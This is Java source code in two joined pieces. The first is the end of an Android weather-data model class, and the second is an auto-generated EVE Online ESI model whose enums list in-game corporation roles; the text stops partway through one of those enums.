mForecastInfo1 = forecastInfo1;
}
public ForecastInfo getForecastInfo2() {
return mForecastInfo2;
}
protected void setForecastInfo2(ForecastInfo forecastInfo2) {
mForecastInfo2 = forecastInfo2;
}
public ForecastInfo getForecastInfo3() {
return mForecastInfo3;
}
protected void setForecastInfo3(ForecastInfo forecastInfo3) {
mForecastInfo3 = forecastInfo3;
}
public ForecastInfo getForecastInfo4() {
return mForecastInfo4;
}
protected void setForecastInfo4(ForecastInfo forecastInfo4) {
mForecastInfo4 = forecastInfo4;
}
public ForecastInfo getForecastInfo5() {
return mForecastInfo5;
}
protected void setForecastInfo5(ForecastInfo forecastInfo5) {
mForecastInfo5 = forecastInfo5;
}
public ForecastInfo getForecastInfo6() {
return mForecastInfo6;
}
protected void setForecastInfo6(ForecastInfo forecastInfo6) {
mForecastInfo6 = forecastInfo6;
}
public ForecastInfo getForecastInfo7() {
return mForecastInfo7;
}
protected void setForecastInfo7(ForecastInfo forecastInfo7) {
mForecastInfo7 = forecastInfo7;
}
public String getCurrentConditionDate() {
return mCurrentConditionDate;
}
protected void setCurrentConditionDate(String currentConditionDate) {
mCurrentConditionDate = currentConditionDate;
}
public int getCurrentCode() {
return mCurrentCode;
}
protected void setCurrentCode(int currentCode) {
mCurrentCode = currentCode;
// mCurrentConditionIconURL = "http://l.yimg.com/a/i/us/we/52/" + currentCode + ".gif";
mCurrentConditionIconURL = "http://l.yimg.com/a/i/us/nws/weather/gr/" + currentCode + "d.png";
}
public int getCurrentTempF() {
return mCurrentTempF;
}
protected void setCurrentTempF(int currentTempF) {
mCurrentTempF = currentTempF;
mCurrentTempC = this.turnFtoC(currentTempF);
}
public int getCurrentTempC() {
return mCurrentTempC;
}
public String getTitle() {
return mTitle;
}
protected void setTitle(String title) {
mTitle = title;
}
public String getDescription() {
return mDescription;
}
protected void setDescription(String description) {
mDescription = description;
}
public String getLanguage() {
return mLanguage;
}
protected void setLanguage(String language) {
mLanguage = language;
}
public String getLastBuildDate() {
return mLastBuildDate;
}
protected void setLastBuildDate(String lastBuildDate) {
mLastBuildDate = lastBuildDate;
}
public String getLocationCity() {
return mLocationCity;
}
protected void setLocationCity(String locationCity) {
mLocationCity = locationCity;
}
public String getLocationRegion() {
return mLocationRegion;
}
protected void setLocationRegion(String locationRegion) {
mLocationRegion = locationRegion;
}
public String getLocationCountry() {
return mLocationCountry;
}
protected void setLocationCountry(String locationCountry) {
mLocationCountry = locationCountry;
}
public String getWindChill() {
return mWindChill;
}
protected void setWindChill(String windChill) {
mWindChill = windChill;
}
public String getWindDirection() {
return mWindDirection;
}
protected void setWindDirection(String windDirection) {
mWindDirection = windDirection;
}
public String getWindSpeed() {
return mWindSpeed;
}
protected void setWindSpeed(String windSpeed) {
mWindSpeed = windSpeed;
}
public String getAtmosphereHumidity() {
return mAtmosphereHumidity;
}
protected void setAtmosphereHumidity(String atmosphereHumidity) {
mAtmosphereHumidity = atmosphereHumidity;
}
public String getAtmosphereVisibility() {
return mAtmosphereVisibility;
}
protected void setAtmosphereVisibility(String atmosphereVisibility) {
mAtmosphereVisibility = atmosphereVisibility;
}
public String getAtmospherePressure() {
return mAtmospherePressure;
}
protected void setAtmospherePressure(String atmospherePressure) {
mAtmospherePressure = atmospherePressure;
}
public String getAtmosphereRising() {
return mAtmosphereRising;
}
protected void setAtmosphereRising(String atmosphereRising) {
mAtmosphereRising = atmosphereRising;
}
public String getAstronomySunrise() {
return mAstronomySunrise;
}
protected void setAstronomySunrise(String astronomySunrise) {
mAstronomySunrise = astronomySunrise;
}
public String getAstronomySunset() {
return mAstronomySunset;
}
protected void setAstronomySunset(String astronomySunset) {
mAstronomySunset = astronomySunset;
}
public String getConditionTitle() {
return mConditionTitle;
}
protected void setConditionTitle(String conditionTitle) {
mConditionTitle = conditionTitle;
}
public String getConditionLat() {
return mConditionLat;
}
protected void setConditionLat(String conditionLat) {
mConditionLat = conditionLat;
}
public String getConditionLon() {
return mConditionLon;
}
protected void setConditionLon(String conditionLon) {
mConditionLon = conditionLon;
}
public String getCurrentText() {
return mCurrentText;
}
protected void setCurrentText(String currentText) {
mCurrentText = currentText;
}
protected void setCurrentTempC(int currentTempC) {
mCurrentTempC = currentTempC;
}
public String getCurrentConditionIconURL() {
return mCurrentConditionIconURL;
}
public Bitmap getCurrentConditionIcon() {
return mCurrentConditionIcon;
}
protected void setCurrentConditionIcon(Bitmap mCurrentConditionIcon) {
this.mCurrentConditionIcon = mCurrentConditionIcon;
}
private int turnFtoC(int tempF) {
return (tempF - 32) * 5 / 9;
}
@SuppressLint("DefaultLocale")
public class ForecastInfo {
private String mForecastDay;
private String mForecastDate;
private int mForecastCode;
private int mForecastTempHighC;
private int mForecastTempLowC;
private int mForecastTempHighF;
private int mForecastTempLowF;
private String mForecastConditionIconURL;
private Bitmap mForecastConditionIcon;
private String mForecastText;
public Bitmap getForecastConditionIcon() {
return mForecastConditionIcon;
}
protected void setForecastConditionIcon(Bitmap mForecastConditionIcon) {
this.mForecastConditionIcon = mForecastConditionIcon;
}
public String getForecastDay() {
return mForecastDay;
}
protected void setForecastDay(String forecastDay) {
String shortDay[] = {"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"};
String longDay[] = {"Monday", "Tuesday", "Wednesday", "Thursday",
"Friday", "Saturday", "Sunday"};
for (int x = 0; x < shortDay.length; x++) {
if (forecastDay.equals(shortDay[x])) {
forecastDay = longDay[x];
}
}
mForecastDay = forecastDay.toUpperCase();
}
public String getForecastDate() {
return mForecastDate;
}
protected void setForecastDate(String forecastDate) {
mForecastDate = forecastDate;
}
public int getForecastCode() {
return mForecastCode;
}
protected void setForecastCode(int forecastCode) {
mForecastCode = forecastCode;
//mForecastConditionIconURL = "http://l.yimg.com/a/i/us/we/52/" + forecastCode + ".gif";
mForecastConditionIconURL = "http://l.yimg.com/a/i/us/nws/weather/gr/" + forecastCode + "d.png";
}
public int getForecastTempHighC() {
return mForecastTempHighC;
}
protected void setForecastTempHighC(int forecastTempHighC) {
mForecastTempHighC = forecastTempHighC;
}
public int getForecastTempLowC() {
return mForecastTempLowC;
}
protected void setForecastTempLowC(int forecastTempLowC) {
mForecastTempLowC = forecastTempLowC;
}
public int getForecastTempHighF() {
return mForecastTempHighF;
}
protected void setForecastTempHighF(int forecastTempHighF) {
mForecastTempHighF = forecastTempHighF;
mForecastTempHighC = turnFtoC(forecastTempHighF);
}
public int getForecastTempLowF() {
return mForecastTempLowF;
}
protected void setForecastTempLowF(int forecastTempLowF) {
mForecastTempLowF = forecastTempLowF;
mForecastTempLowC = turnFtoC(forecastTempLowF);
}
public String getForecastConditionIconURL() {
return mForecastConditionIconURL;
}
public String getForecastText() {
return mForecastText;
}
protected void setForecastText(String forecastText) {
mForecastText = forecastText;
}
}
}
|
|
/*
* EVE Swagger Interface
* An OpenAPI for EVE Online
*
*
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
* Do not edit the class manually.
*/
package net.troja.eve.esi.model;
import java.util.Objects;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonCreator;
import io.swagger.annotations.ApiModel;
import io.swagger.annotations.ApiModelProperty;
import java.util.ArrayList;
import java.util.List;
import java.io.Serializable;
/**
* 200 ok object
*/
@ApiModel(description = "200 ok object")
public class CorporationTitlesResponse implements Serializable {
private static final long serialVersionUID = 1L;
/**
* grantable_role string
*/
public enum GrantableRolesEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesEnum fromValue(String text) {
for (GrantableRolesEnum b : GrantableRolesEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles")
private List<GrantableRolesEnum> grantableRoles = new ArrayList<GrantableRolesEnum>();
/**
* grantable_roles_at_base string
*/
public enum GrantableRolesAtBaseEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtBaseEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtBaseEnum fromValue(String text) {
for (GrantableRolesAtBaseEnum b : GrantableRolesAtBaseEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_base")
private List<GrantableRolesAtBaseEnum> grantableRolesAtBase = new ArrayList<GrantableRolesAtBaseEnum>();
/**
* grantable_roles_at_hq string
*/
public enum GrantableRolesAtHqEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtHqEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtHqEnum fromValue(String text) {
for (GrantableRolesAtHqEnum b : GrantableRolesAtHqEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_hq")
private List<GrantableRolesAtHqEnum> grantableRolesAtHq = new ArrayList<GrantableRolesAtHqEnum>();
/**
* grantable_roles_at_other string
*/
public enum GrantableRolesAtOtherEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtOtherEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtOtherEnum fromValue(String text) {
for (GrantableRolesAtOtherEnum b : GrantableRolesAtOtherEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_other")
private List<GrantableRolesAtOtherEnum> grantableRolesAtOther = new ArrayList<GrantableRolesAtOtherEnum>();
@JsonProperty("name")
private String name = null;
/**
* role string
*/
public enum RolesEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesEnum fromValue(String text) {
for (RolesEnum b : RolesEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles")
private List<RolesEnum> roles = new ArrayList<RolesEnum>();
/**
* roles_at_base string
*/
public enum RolesAtBaseEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtBaseEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtBaseEnum fromValue(String text) {
for (RolesAtBaseEnum b : RolesAtBaseEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_base")
private List<RolesAtBaseEnum> rolesAtBase = new ArrayList<RolesAtBaseEnum>();
/**
* roles_at_hq string
*/
public enum RolesAtHqEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtHqEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtHqEnum fromValue(String text) {
for (RolesAtHqEnum b : RolesAtHqEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_hq")
private List<RolesAtHqEnum> rolesAtHq = new ArrayList<RolesAtHqEnum>();
/**
* roles_at_other string
*/
public enum RolesAtOtherEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
